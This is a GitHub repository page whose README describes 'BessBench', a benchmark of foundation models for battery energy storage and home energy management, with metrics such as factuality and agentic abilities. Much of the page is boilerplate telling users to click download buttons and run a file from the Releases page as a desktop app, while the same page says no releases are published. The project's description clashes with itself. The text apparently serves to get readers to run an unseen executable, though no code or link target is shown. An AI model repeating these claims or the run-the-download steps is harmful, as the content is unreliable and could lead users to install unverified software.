Skip to content

๐Ÿ”‹ Develop and evaluate foundation models for battery energy storage and home management using robust metrics across diverse real-world scenarios.

License

Notifications You must be signed in to change notification settings

Pixeltruth/bess-benchmark

Folders and files

NameName
Last commit message
Last commit date

Latest commit

ย 

History

5 Commits
ย 
ย 
ย 
ย 
ย 
ย 
ย 
ย 

Repository files navigation

๐ŸŽ‰ bess-benchmark - Benchmarking for Energy Management

๐Ÿ“ฅ Download Now

Download bess-benchmark

๐Ÿ“– Introduction

Welcome to BessBench, a benchmark designed for measuring the performance of foundation models in battery energy storage and home energy management scenarios. This tool helps evaluate how well models can perform in real-world energy settings. We focus on key metrics that matter in the energy sector.

๐Ÿ“Š Metrics

BessBench uses a set of evaluation criteria inspired by ElecBench. Here are the metrics we assess:

  1. Expressiveness: How well can the model convey complex ideas?
  2. Factuality: Are the model's outputs correct and true?
  3. Logicality: Does the model follow a logical reasoning process?
  4. Stability: How consistent are the model's responses over time?
  5. Fairness: Does the model treat all scenarios impartially?
  6. Security: How well does the model handle security concerns?
  7. Agentic Abilities: This includes multi-step reasoning, long-term planning, and tool use.

ElecBench metrics

We added a new dimensionโ€”agentic abilitiesโ€”to reflect the needs for large language models to act as agents in real-world tasks.

Agent abilities

๐Ÿš€ Getting Started

BessBench is designed to be user-friendly for all levels of users. Hereโ€™s how you can get started:

  1. Ensure your system meets these basic requirements:

    • Operating System: Windows, macOS, or a recent version of Linux.
    • Memory: At least 4GB of RAM.
    • Storage: 500MB of available disk space.
    • Network: Internet access for downloading necessary files.
  2. Visit this page to download the latest version of BessBench.

๐Ÿ”ง Download & Install

To download BessBench:

  1. Click the button below to go to the Releases page.
  2. Select the latest release version.
  3. Download the file suitable for your operating system.
  4. Run the downloaded file to install BessBench on your computer.

Download bess-benchmark

๐ŸŒŸ Features

BessBench offers several features to make your benchmarking experience straightforward:

  • User-Friendly Interface: Navigate effortlessly through the application.
  • Realistic Scenarios: Benchmark across multiple energy-related scenarios.
  • Detailed Reports: Get insightful reports on model performance.
  • Modular Design: Customize your evaluation metrics based on your needs.

โš™๏ธ Usage

Once installed, follow these steps to run BessBench:

  1. Open the BessBench application.
  2. Choose the benchmarking scenario that suits your needs.
  3. Input your model or data for evaluation.
  4. Click "Run Benchmark" to start the evaluation process.
  5. Review your results and generated reports in the application.

๐ŸŽฏ Scenarios

BessBench uses a scenarioโ€“metrics structure for effective evaluation. The following scenarios are included:

  • Energy Storage Technologies & Devices: Benchmark battery systems and inverter technologies.
  • Home Energy Management: Evaluate models that manage energy use in residential settings.

๐Ÿค Community and Support

We encourage users to participate in the BessBench community. If you have questions or need support:

  1. Check the Issues page for common questions or existing reports.
  2. Join discussions and offer feedback on how we can improve BessBench.
  3. Contribute to the project by submitting your own benchmarking scenarios or metrics.

๐Ÿ“œ License

BessBench is open-source software, and it is available under the MIT License. You can use, modify, and distribute the software freely.

๐Ÿ’ก Acknowledgments

We thank the BessBench community and contributors for their support. Special thanks to the creators of ElecBench and HELM for their foundational work in this area.

Feel free to reach out at any time. Happy benchmarking!

About

๐Ÿ”‹ Develop and evaluate foundation models for battery energy storage and home management using robust metrics across diverse real-world scenarios.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors